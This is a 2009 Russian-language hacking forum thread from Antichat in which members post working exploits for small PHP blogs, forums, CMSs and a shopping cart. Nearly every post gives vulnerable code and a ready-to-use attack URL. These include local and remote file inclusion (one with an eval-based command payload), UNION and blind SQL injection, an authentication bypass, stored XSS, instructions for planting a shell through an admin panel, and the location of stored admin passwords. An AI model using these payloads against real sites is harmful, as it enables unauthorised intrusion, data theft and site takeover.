Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
16.11.2009, 21:16
|
|
Reservists Of Antichat - Level 6
Регистрация: 19.09.2008
Сообщений: 127
Провел на форуме:
835386
Репутация:
1463
|
|
Inspirado (blog engine)
Released 02/02/2009
http://inspirado.sourceforge.net/
LFI
themes/k2/block.php
themes/vistacolors/block.php
PHP код:
<?php include "./blocks/".$blog_blockfile ?>
http://localhost/inspirado_1/themes/k2/block.php?blog_blockfile=../../../../../../../../etc/passwd
SQL
admin/index.php
PHP код:
include "./structure/theme.php";
admin/structure/theme.php
PHP код:
<?php include "./modules.php"; ?>
admin/modules.php
PHP код:
case "editlink":
include "./structure/editlink.php";
admin/structure/editlink.php
PHP код:
$linkInfo=getLinkInfo($_GET["id"])
admin/lib/functions.php
PHP код:
function getLinkInfo ($id) {
$link = dbQuery("SELECT * FROM ".DBPREFIX."headlinks WHERE id=".$id);
$link = mysql_fetch_array($link,MYSQL_ASSOC);
return $link;
http://localhost/inspirado_1/admin/index.php?m=editlink&id=-1+union+select+1,2,version(),user(),5
шелл льется из админки
Administration Panel => Widgets => Create PHP block
искать в
http://localhost/inspirado_1/blocks/shell.php
|
|
|
16.11.2009, 22:37
|
|
Участник форума
Регистрация: 18.07.2009
Сообщений: 272
Провел на форуме:
2083691
Репутация:
330
|
|
Lanius CMS version 0.5.2 RFI
Требования: register_globals= ON
allow_url_include = ON
Уязвимый код index.php:
PHP код:
...
require 'core.php';
include $d_root.'includes/header.php';
...
Смотрим в core.php:
PHP код:
...
if (!file_exists( $d_root.$d_private.'config.php' )) {
header( "Location: install/index.php" );
exit();
}
...
Эксплатация:
Код:
http://localhost/11/index.php?d_root=ftp://login:pass@host/script.php%00
Последний раз редактировалось Ins3t; 16.11.2009 в 22:59..
|
|
|
|
17.11.2009, 10:14
|
|
Участник форума
Регистрация: 18.07.2009
Сообщений: 272
Провел на форуме:
2083691
Репутация:
330
|
|
ADN-FORUM version 0.1b Blind Sql INJECTION
crear.php:
PHP код:
...
$result = mysql_query("SELECT anonimos FROM ".$prefijo."_foros where id='$fid'",$conexion);
$row = mysql_fetch_row($result);
if(!isset($fpusuario) && $row[0]==0){echo"<br><br><center>"._CREARMSG2."<br><br><br><br><a href=\"index.php?fid=$fid\"><img src=\"img/$lenguaje/aceptar.gif\" border=0 align=absmiddle></a></center>";}
...
Реализация:
Код:
http://localhost/19/crear.php?fid=1'/**/and/**/1=(SELECT/**/*/**/FROM(SELECT/**/*/**/FROM(SELECT/**/NAME_CONST((version()),14)d)/*/as/**/t/**/JOIN/**/(SELECT/**/NAME_CONST((version()),14)e)b)a)/**/and/**/'1'='1--+
mq=off
|
|
|
|
17.11.2009, 23:57
|
|
Участник форума
Регистрация: 30.10.2009
Сообщений: 103
Провел на форуме:
736224
Репутация:
388
|
|
BMForum 5.6
Активная xss:
/messenger.php?job=write
в модуле личных сообщений.
В поле "Содержание" пишем:
"><script>alert()</script>
и отправляем.
Активная xss:
/post.php?forumid=[number_forum]
при создании нового Топика.
В поле "Заголовок" пишем:
"><script>alert()</script>
и добавляем. Так же работает в поле "Описание".
Активная xss:
/profile.php
в Профиле. В полях:
-Номер MSN
-Подпись
-Домашняя страница
-Информация о себе
пишем
"><script>alert()</script>
. Будет видно при просмотре Тем с вашими сообщениями и у вас в профиле.
Пассивная xss:
http://localhost/plugins.php?p=tags&jinhua=&listby=&tagname=[tag]&forumid=[id]&page=%22%3E%3Cscript%3Ealert()%3C/script%3E
Так же в наличии несколько sql - инъекций, но на форуме их уже выкладывали.
Последний раз редактировалось Bb0y; 18.11.2009 в 14:40..
Причина: Поправка
|
|
|
|
PHPMySpace Gold Edition 8.0 |
18.11.2009, 18:26
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696
Репутация:
2221
|
|
PHPMySpace Gold Edition 8.0
PHPMySpace Gold Edition 8.0
From ROA with Love 
/modules/ecal/display.php?day=1&month=11&year=<script>alert();</script>
/modules/memberslist/index.php?letter=All&sortby=name&orderby=ASC&query ='><script>alert();</script>
Раскрытие путей
/modules/xtremuserguestbook/sign.php?gbid[]=1
/modules/ecal/display.php?day=1&month[]=11 |
|
|
|
18.11.2009, 21:53
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696
Репутация:
2221
|
|
2z Project
Активная XSS
В комментариях к новости:
[img=javascript:alert()][/img]
Раскрытие путей
/?action=search&author=&catid=0&postdate=&search[]=12
|
|
|
|
19.11.2009, 16:14
|
|
Reservists Of Antichat - Level 6
Регистрация: 19.09.2008
Сообщений: 127
Провел на форуме:
835386
Репутация:
1463
|
|
FreeBlog 0.2
http://sourceforge.net/projects/freeblog
SQL
afficher_commentaire.php
PHP код:
if (isset($_GET['id']))
{
$id = $_GET['id'];
$query="SELECT * FROM commentaires WHERE id_article='$id' && approuve=1 order by id DESC";
mq=off
http://localhost/FreeBlog/afficher_commentaire.php?id=1'+union+select+1,2,ve rsion(),4,5,6,user(),8+--+
|
|
|
|
19.11.2009, 20:35
|
|
Reservists Of Antichat - Level 6
Регистрация: 19.09.2008
Сообщений: 127
Провел на форуме:
835386
Репутация:
1463
|
|
wellyblog-version-0.8.1
sourceforge.net/projects/wellyblog/
Обход авторизации
password.php
PHP код:
$email = $_POST['email'];
$tempsql="select username, password from tbluser where email='".$email."'";
$rspass=mysql_query($tempsql);
$num_rows=mysql_num_rows($rspass);
if($num_rows>0){
$decryptedpass=decrypt(mysql_result($rspass, 0, "password"), mysql_result($rspass, 0, "username"));
mq=off
$_POST['email']=bla@bla.com' or 1=1 limit 0,1 --
|
|
|
|
20.11.2009, 00:36
|
|
Reservists Of Antichat - Level 6
Регистрация: 19.09.2008
Сообщений: 127
Провел на форуме:
835386
Репутация:
1463
|
|
profitCode Shopping Cart
Release Date:2009-04-11
http://sourceforge.net/projects/profbiz-cart/
http://profbiz-cart.sourceforge.net/
LFI
cart.php
PHP код:
global $chckoutaction, $payMethod, $donecart, $itemcount, $thmbImgsize, $ckprvd;
include "mainincs/cartfunctions.php";
if($ckprvd) {
include ("checkouts/checkout_" . $ckprvd . ".php");
в checkouts/ есть файл checkout_cod.php, достраиваем констукцию до него
можно инклудить файлы .php
http://localhost/store/cart.php?ckprvd=cod.php/../../leftmenu
NULL-byte слешируется, поэтому для иклуда произвольного файла используем Альтернативу от Raz0r,
в моем случае это 270 точек (Windows)
Код HTML:
http://localhost/store/cart.php?ckprvd=cod.php/../../../../../../../boot.ini..............................................................................................................................................................................................................................................................................
RFI
index.php
PHP код:
else if($proMod) {
include "$proMod" . ".php";
http://localhost/store/index.php?proMod=data:,%3C?php%20eval($_REQUEST[cmd]);%20?%3E&cmd=phpinfo();
Пароли администратора и к базе хранятся в adminshop/config/shopSettings.php
|
|
|
|
20.11.2009, 01:22
|
|
Участник форума
Регистрация: 18.07.2009
Сообщений: 272
Провел на форуме:
2083691
Репутация:
330
|
|
PIXE CMS VERSION 1.02
Ну вот наконец то вырвался я из бана 
Уязвимость присутствует в скрипте index.php (и не только):
Уязвимый код:
PHP код:
...
include "admin/lang/".$language.".php";
...
Эксплатация:
Код:
http://localhost/22/index.php?language=../../../../FILE%00
Для эксплатации понадобится register_globals = ON
|
|
|
|
|
|
|
|
Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
|
|
|
|
Похожие темы
Линейный вид
